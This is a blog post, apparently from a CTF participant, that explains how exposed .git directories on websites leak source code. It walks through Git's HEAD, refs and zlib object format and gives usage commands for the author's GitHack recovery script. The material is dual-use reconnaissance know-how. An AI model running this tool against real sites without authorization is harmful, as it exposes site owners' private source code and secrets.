A New GitHack Script

Git hack happens when site maintainers use Git to manage the source code of the website but forget to delete .git directory. By accessing http://your.target.site/.git/ , you can easily find Git information and even the source code of the target website. Sometimes you may see 403 when you are trying to visit that URL, but that is because the access to directories is restricted. In this case, you can still access and download certain files if you know the exact URL to the file.

Why to write this script

Recently I went through a CTF hosted by Wuhan University. There was a web challenge about Git hack.

When I was trying to solve that challenge with a widely-used GitHack script which was supposed to download some source codes, no files were downloaded even all of the .git files where listed on the page. Quickly I analyzed the script and found out the reason.

For that script, the process is like

  1. Retrieve the index file and extract file names and SHA1;
  2. Download the files with the SHA1;
  3. Save the downloaded files into organized directories.

Seems everything is going perfect. However, a fatal problem may happen to the step 1. If there is no files in the current repository, the index file will be empty!

The index is a single, large, binary file in <baseOfRepo>/.git/index, which lists all files in the current branch, their sha1 checksums, time stamps and the file name — it is not another directory with a copy of files in it. [1]

After I realize this problem, I decided to write a new one with another method.

How my script works

First off, we need to know what we need in the  .git  directory to restore files.

HEAD                              # HEAD pointer ref
refs
    \_ heads
           \_ master              # real pointer to the newest commit
objects
    \_ *                          # all files compressed with zlib
  • HEAD: reference to the pointer. (ref: refs/heads/master)
  • refs/heads/master: real pointer. (f43003bce4f11d9b2532b5fac0a0006126f14e2a)
  • objects: a file with the hash will be stored here in the format of ./hash[0:2]/hash[2:] . Files are compressed with zlib.

Secondly, there are 3 types of objects in the object directories.

Commit

It specifies the Git log information and the hashes of the tree node and parent node. Example shown below.

commit: 
    b'commit 210\x00tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904 
    parent 912133f7bd228e96757a531ef52d1777de10ca8a 
    author Alice <xxx@qq.com> 1554748133 +0800 
    committer Alice <xxx@qq.com> 1554748133 +0800

Tree

It specifies the tree structure. The branches of a tree node can be either a blob or another tree. The entries in the tree contains filenames and the hashes their blobs. The graph[2] describes the structure. Also, an example is provided in the below.

tree: 
  b'tree 0\x00’ 
# or 
  b"tree 32\x00100644 flag\x00'0\xedavmI\x048\xad\x80\xe0\x7f\xec\x85|\x83\xfbB\xb3"

Blob

It specifies the content of a certain file. Example here.

blob: 
    b'blob 37\x00WHUCTF{xxxxxxxxxxxxxxxxxxxxxxxx}\n'

My script retrieves the first commit hash from the refs/heads/master  in the step 1, and then traverse all commit hashes with the recursion algorithm. Within each round, the script will locate the tree, parses it and then find the blob and extracts it. Then, all files will be classified in to organized directories.

Script

Without installing git, you can download files.

Project: https://github.com/hazzel-cn/GitHack

Usage:

git clone https://github.com/hazzel-cn/GitHack.git 
cd GitHack 
python3 githack.py http://you.target/.git/

Screenshot

githack.py

gitclone.py

Reference

  • [1] https://stackoverflow.com/questions/3689838/whats-the-difference-between-head-working-tree-and-index-in-git/3690796
  • [2] https://www.jianshu.com/p/8659c9ae00cb
  • [3] https://www.jianshu.com/p/6d93d6153070

Leave a Reply

Your email address will not be published. Required fields are marked *